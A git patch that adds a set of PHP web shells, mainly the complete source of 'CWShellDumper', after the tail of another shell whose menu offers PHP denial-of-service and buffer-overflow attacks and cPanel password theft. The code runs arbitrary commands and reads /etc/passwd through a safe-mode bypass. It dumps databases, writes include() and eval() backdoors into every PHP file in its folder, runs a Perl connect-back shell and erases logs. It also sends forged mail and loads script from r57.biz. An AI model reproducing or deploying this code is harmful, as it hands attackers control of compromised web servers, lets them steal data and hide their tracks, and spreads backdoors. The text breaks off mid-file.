+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','proxy_port',10,'31337'));
+echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+echo $table_up1.div_title($lang[$language.'_text81'],'id5525555').$table_up2.div('id5525555').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port1',35,'9999').ws(4).in('submit','submit',0,$lang[$language.'_butt3']));
+echo $te."</td>".$fe."</tr></div></table>";
+
+
+echo $table_up1.div_title($lang[$language.'_text140'],'id38').$table_up2.div('id38').$ts."<tr><td valign=top width=25%>".$ts;
+echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos1').in('submit','submit',0,'Recursive memory exhaustion').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos2').in('submit','submit',0,'Memory_limit [pack()]').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos3').in('submit','submit',0,'BoF [unserialize()]').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos4').in('submit','submit',0,'BoF ZendEngine').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos5').in('submit','submit',0,'SQlite [dl()] vuln').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos6').in('submit','submit',0,'PCRE [preg_match()](PHP<5.2.1)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos7').in('submit','submit',0,'Mem_limit [str_repeat()](PHP<5.2.1)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos8').in('submit','submit',0,'Apache process killer').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos9').in('submit','submit',0,'Overload [tempnam()](PHP<5.1.2)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos10').in('submit','submit',0,'BoF [wordwrap()](PHP<5.1.2)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos11').in('submit','submit',0,'BoF [array_fill()](PHP<5.1.2)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos12').in('submit','submit',0,'BoF [substr_compare()](PHP<5.1.2)').$fe);
+echo $te."</td><td valign=top width=25%>".$ts;
+echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos13').in('submit','submit',0,'Arr. Cr. 64b[unserialize()](PHP<5.2.1)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos14').in('submit','submit',0,'BoF [str_ireplace()](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos15').in('submit','submit',0,'BoF [htmlentities()](PHP<5.1.6,4.4.4)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos16').in('submit','submit',0,'BoF [zip_entry_read()](PHP<4.4.5)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos17').in('submit','submit',0,'BoF [sqlite_udf_decode_binary()](PHP<5.2.1)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos18').in('submit','submit',0,'BoF [msg_receive()](PHP<5.2.1)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos19').in('submit','submit',0,'BoF [php_stream_filter_create()](PHP5<5.2.1)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos20').in('submit','submit',0,'BoF [unserialize()](PHP<4.4.4)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos21').in('submit','submit',0,'BoF [gdImageCreateTrueColor()](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos22').in('submit','submit',0,'BoF [gdImageCopyResized()](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos23').in('submit','submit',0,'DoS [iconv_substr()](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos24').in('submit','submit',0,'DoS [setlocale()](PHP<5.2.x)').$fe);
+echo $te."</td><td valign=top width=25%>".$ts;
+echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos25').in('submit','submit',0,'DoS [glob()] 1 (PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos26').in('submit','submit',0,'DoS [glob()] 2 (PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos27').in('submit','submit',0,'DoS [fnmatch()](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos28').in('submit','submit',0,'BoF [imagepsloadfont()](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos29').in('submit','submit',0,'BoF mSQL [msql_connect](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos30').in('submit','submit',0,'BoF [chunk_split()](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos31').in('submit','submit',0,'BoF [php_win32sti.dl](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos32').in('submit','submit',0,'BoF [php_iisfunc.dll](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos33').in('submit','submit',0,'BoF [ntuser_getuserlist()](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos34').in('submit','submit',0,'DoS [com_print_typeinfo()](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos35').in('submit','submit',0,'BoF [iconv()](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos36').in('submit','submit',0,'BoF [iconv_m_d_headers()](PHP<5.2.x)').$fe);
+echo $te."</td><td valign=top width=25%>".$ts;
+echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos37').in('submit','submit',0,'BoF [iconv_mime_decode()](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos38').in('submit','submit',0,'BoF [iconv_strlen()](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos39').in('submit','submit',0,'BoF [printf()](PHP<5.2.5) and prior').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos40').in('submit','submit',0,'BoF [mssql_connect(), mssql_pconnect()](PHP<4.4.6) and prior').$fe);
+/*echo sr(10,"",$fs.in('hidden','cmd',0,'dos').in('submit','submit',0,'BoF [()](PHP<5.2.x)').$fe);*/
+echo $te."</td></tr></div></table>";
+echo $fs.$table_up1.div_title($lang[$language.'_text211'],'id11111').$table_up2.div('id11111').$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text213']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','htacces',10,'.htaccess').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text218']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','egy_ini',10,'ini.php').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text228']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','egy_vb',10,'vb_hacker.php').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text230']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','egy_cp',10,'pass_cpanel.php').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
+echo $te.'</div>'.$table_end1.$fe;
+{
+
+
+
+
+
+
+echo $te."</td>".$fe."</tr></div></table>";
+}
+
+
+echo $te."</td></tr></div></table>";
+echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=tahoma size=-2><b>o---[ EgY_SpIdEr | </a> | <a egy_spider@hotmail.com>egy_spider@hotmail.com</a> developer by EgY SpIdEr ]---o</b></font></div></td></tr></table>";
+echo '</body></html>';
+?>
From 7d611010673765cd3396687a3a4990b76246610e Mon Sep 17 00:00:00 2001
From: Anthony Cozamanis <anthony.cozamanis@chronicle.jp.net>
Date: Wed, 16 Dec 2015 16:12:10 +0800
Subject: [PATCH 2/2] Few new php shells
---
php/CWShellDumper.php | 773 ++++++++++
php/aspx.php | 2590 ++++++++++++++++++++++++++++++++++
php/cgi.php | 690 +++++++++
php/cmd.php | 1102 +++++++++++++++
php/dq.php | 3112 +++++++++++++++++++++++++++++++++++++++++
php/ekin0x.php | 607 ++++++++
php/kacak.php | 903 ++++++++++++
php/links.php | 78 ++
php/liz0zim.php | 34 +
php/login.php | 583 ++++++++
php/sadrazam.php | 1973 ++++++++++++++++++++++++++
11 files changed, 12445 insertions(+)
create mode 100644 php/CWShellDumper.php
create mode 100644 php/aspx.php
create mode 100644 php/cgi.php
create mode 100644 php/cmd.php
create mode 100644 php/dq.php
create mode 100644 php/ekin0x.php
create mode 100644 php/kacak.php
create mode 100644 php/links.php
create mode 100644 php/liz0zim.php
create mode 100644 php/login.php
create mode 100644 php/sadrazam.php
diff --git a/php/CWShellDumper.php b/php/CWShellDumper.php
new file mode 100644
index 0000000..937f6c4
--- /dev/null
+++ b/php/CWShellDumper.php
@@ -0,0 +1,773 @@ +<?php +$entry_line="r57.biz"; +$fp = fopen("index.htm", "w"); +fputs($fp, $entry_line); +fclose($fp); +#GreetZ:SultanMehmed + +// Variables + $info = @$_SERVER['SERVER_SOFTWARE']; + $page = @$_SERVER['SCRIPT_NAME']; + $site = getenv("HTTP_HOST"); + $uname = php_uname(); + $smod = ini_get('safe_mode'); + if ($smod == 0) { $safemode = "<font color='lightgreen'>KAPALI</font>"; } + else { $safemode = "<font color='red'>ACIK</font>"; } + $dir = @realpath($_POST['dir']); + $mkdir = @$_POST['makedir']; + $mydir = @$_POST['deletedir']; + $cmd = @$_GET['cmd']; + $host = @$_POST['host']; + $proto = @$_POST['protocol']; + $delete = @$_POST['delete']; + $phpeval = @$_POST['php_eval']; + $db = @$_POST['db']; + $query = @$_POST['query']; + $user = @$_POST['user']; + $pass = @$_POST['passd']; + $myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018"); + + + $quotes = get_magic_quotes_gpc(); +if ($quotes == "1" or $quotes == "on") + { + $quot = "<font color='red'>ACIK</font>"; + } + else + { + $quot = "<font color='lightgreen'>KAPALI</font>"; + } + // Perms + function getperms($fn) +{ +$mode=fileperms($fn); +$perms=''; +$perms .= ($mode & 00400) ? 'r' : '-'; +$perms .= ($mode & 00200) ? 'w' : '-'; +$perms .= ($mode & 00100) ? 'x' : '-'; +$perms .= ($mode & 00040) ? 'r' : '-'; +$perms .= ($mode & 00020) ? 'w' : '-'; +$perms .= ($mode & 00010) ? 'x' : '-'; +$perms .= ($mode & 00004) ? 'r' : '-'; +$perms .= ($mode & 00002) ? 'w' : '-'; +$perms .= ($mode & 00001) ? 'x' : '-'; +return $perms; +} + // milw0rm Search (locushell) + +$Lversion = @php_uname('r'); +$OSV = @php_uname('s'); +if(eregi('Linux',$OSV)) +{ +$Lversion=substr($Lversion,0,6); +$millink="http://milw0rm.com/search.php?dong=Linux Kernel".$Lversion; + +}else{ +$Lversion=substr($Lversion,0,3); +$millink="http://milw0rm.com/search.php?dong=".$OSV." 
".$Lversion; +} +if(isset($_POST['milw0'])) { echo "<script>window.location='".$millink."'</script>"; } + //Space + $spacedir = @getcwd(); + $free = @diskfreespace($spacedir); + +if (!$free) {$free = 0;} + $all = @disk_total_space($spacedir); +if (!$all) {$all = 0;} +function view_size($size) +{ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} +$percentfree = intval(($free*100)/$all); + + +// PHPinfo +if(isset($_POST['phpinfo'])) +{ +die(phpinfo()); +} + + +// Make File + + $name = htmlspecialchars(@$_POST['names']); + $src = @$_POST['source']; + if(isset($name) && isset($src)) + { + if($_POST['darezz'] != realpath(".")) { $name = $_POST['darezz'].$name; } + $ctd = fopen($name,"w+"); + fwrite($ctd, $src); + fclose($ctd); + echo "<script>alert('Uploaded')</script>"; + } + +// Upload File + $path = @$_FILES['ffile']['tmp_name']; + $name = @$_FILES['ffile']['name']; + if(isset($path) && isset($name)) +{ +if($_POST['dare'] != realpath(".")) { $name = $_POST['dare'].$name; } + if(move_uploaded_file($path, $name)) + { + echo "<script>alert('Uploaded')</script>"; + } + else + { + echo "<script>alert('Error')</script>"; +} } + +// Delete File + + + if(isset($delete) && $delete != $dir) +{ + if(file_exists($delete)) + { + unlink($delete); + echo "<script>alert('File Deleted')</script>"; + } + +} + +// Database + + if(isset($db) && isset($query) && isset($_POST['godb'])) +{ + $mysql = mysql_connect("localhost", $user, $pass)or die("<script>alert('Connection Failed')</script>"); + $db = mysql_select_db($db)or die(mysql_error()); + $queryz = mysql_query($query)or die(mysql_error()); +if($query) { echo "<script>alert('Done')</script>"; } +else { echo "<script>alert('Error')</script>"; } +} + +// Dump Database [pacucci.com] 
+if(isset($_POST['dump']) && isset($user) && isset($pass) && isset($db)){ +mysql_connect('localhost', $user, $pass); +mysql_select_db($db); +$tables = mysql_list_tables($db); +while ($td = mysql_fetch_array($tables)) +{ +$table = $td[0]; +$r = mysql_query("SHOW CREATE TABLE `$table`"); +if ($r) +{ +$insert_sql = ""; +$d = mysql_fetch_array($r); +$d[1] .= ";"; +$SQL[] = str_replace("\n", "", $d[1]); +$table_query = mysql_query("SELECT * FROM `$table`"); +$num_fields = mysql_num_fields($table_query); +while ($fetch_row = mysql_fetch_array($table_query)) +{ +$insert_sql .= "INSERT INTO $table VALUES("; +for ($n=1;$n<=$num_fields;$n++) +{ +$m = $n - 1; +$insert_sql .= "'".mysql_real_escape_string($fetch_row[$m])."', "; +} +$insert_sql = substr($insert_sql,0,-2); +$insert_sql .= ");\n"; +} +if ($insert_sql!= "") +{ +$SQL[] = $insert_sql; +} +} +} +$dump = "-- Database: ".$_POST['db'] ." \n"; +$dump .= "-- CWShellDumper v3\n"; +$dump .= "-- r57.biz\n"; +$dumpp = $dump.implode("\r", $SQL); +$name = $db."-".date("d-m-y")."cyberwarrior.sql"; +Header("Content-type: application/octet-stream"); +Header("Content-Disposition: attachment; filename = $name"); +echo $dumpp; +die(); +} + +// Make Dir +if(isset($mkdir)) { + +mkdir($mkdir); +if($mkdir) { echo "<script>alert('Tamamdýr.')</script>"; } } + +// Delete Directory + +if(isset($mydir) && $mydir != "$dir") { +$d = dir($mydir); +while($entry = $d->read()) { + if ($entry !== "." && $entry !== "..") { + unlink($entry); + } +} +$d->close(); +rmdir($mydir); + +} + +//Infect Files [RFI] + +if(isset($_POST['inf3ct'])) +{ +foreach (glob("*.php") as $lola) +{ +$dira = '.'; +$asdi = fopen($lola, 'a+'); +@fwrite($asdi, ' +<?php +include($_GET[\'pwn\']); +?>'); +@fclose($asdi); +} +if($asdi) +{ +$textzz = '<font size=2 color=lightgreen>Oldu:<br> ?pwn=[shell]</font>'; +} +else { +$textzz = '<font size=2 color=red>HATA! 
(Permlere Dikkat Et..)</font>'; +} +} + +//Infect Files [Eval] +if(isset($_POST['evalinfect'])) +{ +foreach (glob("*.php") as $lal) +{ +$dira = '.'; +$axd = fopen($lal, 'a+'); +@fwrite($axd, ' +<?php +eval(stripslashes($_GET[\'eval\'])); +?>'); +@fclose($axd); +} +if($axd) +{ +$textz0 = '<font size=2 color=lightgreen>Oldu:<br> ?eval=[eval]</font>'; +} +else { +$textz0 = '<font size=2 color=red>HATA! (Permler IZIn Vermior..)</font>'; +} +} + +// Images + if(@$_GET['com'] == "image") + { + $images = array( + "folder"=> "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", + "file"=> "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", + "floppy"=> "R0lGODlhECAQILMgIB8jVq2yyI0csGVuGcjL2v///9TY405WfqOmvjI+bHoaoQsMQxR+uubn7bu+0f///yH5BAEgIA8gLCAgICAQIBAgIAR/8CHEHlVq6HMZNEUYJGFZMiACFtxpCiBDHgLjEwogzLfZDAuBw0AsEn0eIAKocAR+E0Yls1koAn2skjLFDA7WQKlBJh6z4AEiVDZneDDFrNEwE95QRHwgaFOdSlx6CwcKdndOUQxxJgZgFgIYCjALCQN/eRUWIAsPIHggoSCdESA7" + ); +header("Content-type: image/gif"); +header("Cache-control: public"); +header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); +header("Cache-control: max-age=".(60*60*24*7)); +header("Last-Modified: ".date("r",filemtime(__FILE__))); +$image = $images[$_GET['img']]; + echo base64_decode($image); + } +//File List + + chdir($dir); + if(!isset($dir)) { $dir = @realpath("."); } + if($dir != "/") { $dir = @realpath("."); } else { $dir = "."; } + if (substr($dir,-1) != DIRECTORY_SEPARATOR) {$dir .= DIRECTORY_SEPARATOR;} + $pahtw = 0; + $filew = 0; + $num = 1; + + if (is_dir($dir)) + { + if ($open = opendir($dir)) + { + if(is_dir($dir)) { + $typezz = "DIR"; + $pahtw++; + } + while (($list = readdir($open)) == true) + { + + if(is_dir($list)) { + $typezz = "DIR"; + $pahtw++; + @$listf.= '<tr><td valign=top><img src=?com=image&img=folder><font size=2 face=Verdana>['.$list.']<td valign=top><font size=2 face=Verdana>'.$typezz.'</font></td><td valign=top></td><td valign=top><font size=2 face=Verdana>' . 
getperms($list) .'</font></td></tr>'; } +else { + + $lolz = filesize($list) / 1024; + $lolx = intval($lolz); + if($lolx == 0) { $lolx = 1; } + $typezz = "DOSYA"; + $filew++; + $listz = "/".$list; + if(eregi($page,$listz)) { @$listf.= '<tr><td valign=top><img src=?com=image&img=file><font size=2 face=Verdana color=yellow>'.$list.'<td valign=top><font size=2 face=Verdana>'.$typezz.'</td><td valign=top width=15%><font size=2 face=Verdana>' . $lolx .' Kb</td><td valign=top><font size=2 face=Verdana>' . getperms($list) . '</font></tr>'; } + elseif(eregi('config',$listz) && eregi('.php',$listz)) { @$listf.= '<tr><td valign=top><img src=?com=image&img=file><font size=2 face=Verdana><b>'.$list.'</b><td valign=top><font size=2 face=Verdana>'.$typezz.'</td><td valign=top width=15%><font size=2 face=Verdana>' . $lolx .' Kb</td><td valign=top><font size=2 face=Verdana>' . getperms($list) . '</font></tr>'; } + else {@$listf.= '<tr><td valign=top><img src=?com=image&img=file><font size=2 face=Verdana>'.$list.'<td valign=top><font size=2 face=Verdana>'.$typezz.'</td><td valign=top width=15%><font size=2 face=Verdana>' . $lolx .' Kb</td><td valign=top><font size=2 face=Verdana>' . getperms($list) . 
'</font></tr>'; } } + + } + closedir($open); + + } +$fileq = $pahtw + $filew; } + + + + +echo "<html> +<head> +<style> +table.menu { +border-width: 0px; + border-spacing: 1px; + border-style: solid; + border-color: #a6a6a6; + border-collapse: separate; + background-color: rgb(98, 97,97); +} +table.menuz { +border-width: 0px; + border-spacing: 1px; + border-style: solid; + border-color: #a6a6a6; + border-collapse: separate; + background-color: rgb(98, 97,97); +} +table.menu td { + border-width: 1px; + padding: 1px; + border-style: none; + border-color: #333333; + background-color: #000000; + -moz-border-radius: 0px; +} +table.menuz tr { + border-width: 1px; + padding: 1px; + border-style: none; + border-color: #333333; + background-color: #000000; + -moz-border-radius: 0px; +} + +table.menuz tr:hover { + background-color: #111111; +} +input,textarea,select { +font: normal 11px Verdana, Arial, Helvetica, sans-serif; +background-color:black; +color:#a6a6a6; +border: solid 1px #363636; +} +</style> + +</head> +<SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT> +<body bgcolor='#000000' text='#ebebeb' link='#ebebeb' alink='#ebebeb' vlink='#ebebeb'> +<table style='background-color:#333333; border-color:#a6a6a6' width=100% border=0 align=center cellpadding=0 cellspacing=0> +<tr><td> +<center><b><font size='6' face='Webdings'>ü</font> +<font face='Verdana' size='5'><a href='".@$_SERVER['HTTP_REFERER']."'>~ CWShell ~</font></a> +<font size='6' face='Webdings'>ü</font></b> +</center> +<SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT> +</td></tr></table><table class=menu width=100%<tr><td> +<font size='1' face='Verdana'><b>Site: </b><u>$site</u> <br> +<b>Server Name: </b><u>" . $_SERVER['SERVER_NAME'] . "</u> <br> +<b>Server Bilgisi : </b> <u>$info</u> <br> +<b>Uname -a:</b> <u>$uname</u> <br> +<b>Klasör:</b> <u>" . $_SERVER['DOCUMENT_ROOT'] . 
"</u> <br> +<b>Safe Mode:</b> <u>$safemode</u> <br> +<b>Sihirli Sozler:</b> <u>$quot</u> <br> +<b>Sayfa:</b> <u>$page</u><br> +<b>Boþ Alan:</b> <u>" . view_size($free) . " [ $percentfree% ]</u> <br> +<b>Toplam Alan:</b> <u>" . view_size($all) . "</u> <br> +<b>IP:</b> <u>" . $_SERVER['REMOTE_ADDR'] ."</u> - Server IP:</b> <a href='http://whois.domaintools.com/". $_SERVER['SERVER_ADDR'] ."'>".$_SERVER['SERVER_ADDR']."</a></td></tr> +<tr><td><form method='post' action=''> +<center><input type=submit value='File List' name=filelist> - <input type=submit value='View PhpInfo' name=phpinfo> - <input type=submit value='Encoder' name='encoder'> - <input type='submit' value='Send Fake Mail' name='mail'> - <input type='submit' value='Cmd Execution' name='commex'> - <input type='submit' name='logeraser' value='Logs Eraser'> - <input type='submit' name='connectback' value='Connect Back'> - <input type='submit' name='safemodz' value='Safe Mode Bypass'> - <input type='submit' name='milw0' value='Milw0rm Search'></center></td></tr>"; +// Safe Mode Bypass +if(isset($_POST['safemodz'])) +{ +echo "<tr><td valign=top width=50%> +<center><b><font size='2' face='Verdana'>Safe-Mode Bypass[Dosyalar]<br></font></b> +<form action='' method='post'> + <font size='1' face='Verdana'>Dosya adý:</font><br> <input type='text' name='filew' value='/etc/passwd'> <input type='submit' value='Dosyayý Oku' name='redfi'><br> + </td><tr> +<td valign=top> +<center><b><font size='2' face='Verdana'>Safe-Mode Bypass [Klasörler]<br></font></b> + <form method='post' action=''> + <font size='1' face='Verdana'>Klasör:</font><br> + <input type='text' name='directory'> <input type='submit' value='Listele' name='reddi'>"; + } + // Safe Mode Bypass: File +if(isset($_POST['redfi'])) +{ + $test=''; + $tempp= tempnam($test, "cx"); + $get = htmlspecialchars($_POST['filew']); + if(copy("compress.zlib://".$get, $tempp)){ + $fopenzo = fopen($tempp, "r"); + $freadz = fread($fopenzo, filesize($tempp)); + fclose($fopenzo); + 
$source = htmlspecialchars($freadz); + echo "<tr><td><center><font size='1' face='Verdana'>$get</font><br><textarea rows='20' cols='80' name='source'>$source</textarea>"; + unlink($tempp); + } else { + echo "<tr><td><center><font size='1' color='red' face='Verdana'>HATA</font>"; + } + +} + +// Safe Mode Bypass: Directory + if(isset($_POST['reddi'])){ + +function dirz() +{ +$dirz = $_POST['directory']; +$files = glob("$dirz*"); + +foreach ($files as $filename) { + echo "<tr><td><font size='1' face='Verdana'>"; + echo "$filename\n"; + echo "</font><br>"; +} +} +echo "<br>"; dirz(); +} + +// Connect Back +if(isset($_POST['connectback'])) +{ +echo " +<tr><td> +<center><font size='2' face='Verdana'><b>Back-Connect</b><br></font> +<form method='post' action=''><input type='text' name='connhost' size='15'value='target'> <input type='text' name='connport' size='5' value='port'> <input type='submit' name='connsub' value='Run'></form>"; +} +if(isset($_POST['logeraser'])) +{ +echo "<tr><td> +<center><b><font size='2' face='Verdana'>:: OS ::<br></font></b> + <select name=functionp> + <option>linux</option> + <option>sunos</option> + <option>aix</option> + <option>irix</option> + <option>openbsd</option> + <option>solaris</option> + <option>suse</option> + <option>lampp</option> + <option>debian</option> + <option>freebsd</option> + <option>misc</option> + </select><br><input type='submit' name='runer' value='Erase'></table>"; + } + +// Connect Back +if(isset($_POST['connsub'])) +{ +$sources = base64_decode("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"); +$openz = fopen("cbs.pl", "w+")or die("Error"); +fwrite($openz, $sources)or die("Error"); +fclose($openz); +$aids = passthru("perl cbs.pl ".$_POST['connhost']." 
".$_POST['connport']); +unlink("cbs.pl"); +} +if(isset($_POST['connsub'])) { echo "<tr><td><font color='lightgreen' face='Verdana' size='2'>Done.</font>"; } + + // Logs Eraser +if(isset($_POST['runer'])) +{ +echo "<tr><td><center><textarea cols='30' rows='2'>"; +$erase = base64_decode(""); +$openp = fopen("logseraser.pl", "w+")or die("Error"); +fwrite($openp, $erase)or die("Error"); +fclose($openp); +$aidx = passthru("perl logseraser.pl ".$_POST['functionp']); +unlink("logseraser.pl"); +echo "</textarea>"; +} + +if(isset($_POST['commex'])) +{ +echo "<tr><td> +<center><b><font size='2' face='Verdana'>CMD :]<br></font></b> + <input name=cmd size=20 type=text> + <select name=functionz> + <option>passthru</option> + <option>popen</option> + <option>exec</option> + <option>shell_exec</option> + <option>system</option> + </select><br><input type='submit' name='cmdex' value='Enter'></table>"; + } + if(isset($_POST['cmdex'])) + { echo "<tr><td>"; + switch (@$_POST['functionz']) { + case "system": + system(stripslashes($_POST['cmd'])); + + break; + case "popen": + $handle = popen($_POST['cmd'].' 2>&1', 'r'); + echo "'$handle'; " . gettype($handle) . 
"\n"; + $read = fread($handle, 2096); + echo $read; + pclose($handle); + + break; + case "shell_exec": + shell_exec(stripslashes($_POST['cmd'])); + + + break; + case "exec": + exec(stripslashes($_POST['cmd'])); + + break; + case "passthru": + passthru(stripslashes($_POST['cmd'])); + + } + } + +elseif(isset($_POST['mail'])) +{ +echo "<form method='post' action=''> +<td valign=top><center><font face='Verdana' size='2'>FakeMail [HTML Onaylý]</font></center> +<center><font face='Verdana' size='1'>Kime:<br> +<input type='text' size='19' name='mto'><br> +Kimden:<br> +<input type='text' size='19' name='mfrom'><br> +Konu:<br> +<input type='text' size='19' name='mobj'><br> +Mesaj:<br> +<textarea name='mtext' cols=20 rows=4></textarea><br> +<br><input type='submit' value='Yolla' name='senm'> +</form></table><br>";} +if(isset($_POST['senm'])) +{ +//Mail With HTML <- webcheatsheet.com +$to = $_POST['mto']; +$subject = $_POST['mobj']; +$contentz = $_POST['mtext']."<!--"; +$random_hash = md5(date('r', time())); +$headers = "From: ".$_POST['mfrom']."\r\nReply-To: ".$_POST['mfrom']; +$headers .= "\r\nContent-Type: multipart/alternative; boundary=\"PHP-alt-".$random_hash."\""; +ob_start(); +?> + +--PHP-alt-<?php echo $random_hash; ?> +Content-Type: text/html; charset="iso-8859-1" +Content-Transfer-Encoding: 7bit + +<? echo "$contentz"; ?> +--PHP-alt-<?php echo $random_hash; ?>-- +<? 
+$message = ob_get_clean(); + +$mail = @mail( $to, $subject, $message, $headers ); + +if($mail) { echo "<br><td valign=top> +<center><font color='green' size='1'>Mail Sent</font></center></table>"; } +else { echo "<br><td valign=top> +<center><font color='red' size='1'>Error</font></center></table>"; } +} + +elseif(isset($_POST['encoder'])) { +//Encoder +echo "<form method='post' action=''><td valign=top> +<center><font face='Verdana' size='1'>Text:</font><br><textarea name='encod'></textarea><br><input type='submit' value='Encode' name='encode'></form></table>"; +} +if(isset($_POST['encode'])) { echo "<td valign=top> +<center><font face='Verdana' size='1'> +MD5:     <input type='text' size='35' value='".md5($_POST['encod'])."'><br> +Sha1:    <input type='text' size='35' value='".sha1($_POST['encod'])."'><br> +Crc32:    <input type='text' size='34' value='".crc32($_POST['encod'])."'><br><br> +Base64 Encode: <input type='text' size='35' value='".base64_encode($_POST['encod'])."'><br> +Base64 Decode: <input type='text' size='36' value='".base64_decode($_POST['encod'])."'></table>";} + +//File List +echo "</table><table width=100%><tr><td> +<center><font size='1' face='Verdana'>Toplam Dosyalar: $fileq [$filew files and $pahtw directory] </font></center></td></tr></table> +<center><table class=menuz width=100% cellspacing=0 cellpadding=0 border=0> +<font size='1'> +<td valign=top><font face='Verdana' size='2'><b>Dosya Adý :</b></font></td><td valign=top><font face='Verdana' size='2'><b>Tip:</b></font></td><td valign=top width=15%><font face='Verdana' size=2><b>Boyut:</b></font></td><td valign=top width=10%><font face='Verdana' size='2'><b>Perms:</b></font></td>$listf</font> +</table></center>"; + +echo " +<br> +<table class='menu' cellspacing='0' cellpadding='0' border='0' width='100%'><tr><td valign=top> +<center><b><font size='2' face='Verdana'>Server Uzerinde PHP Kodu :<br></font></b>"; +if(!isset($phpeval)) +{ +echo " + <form method='post' action=''> + <textarea 
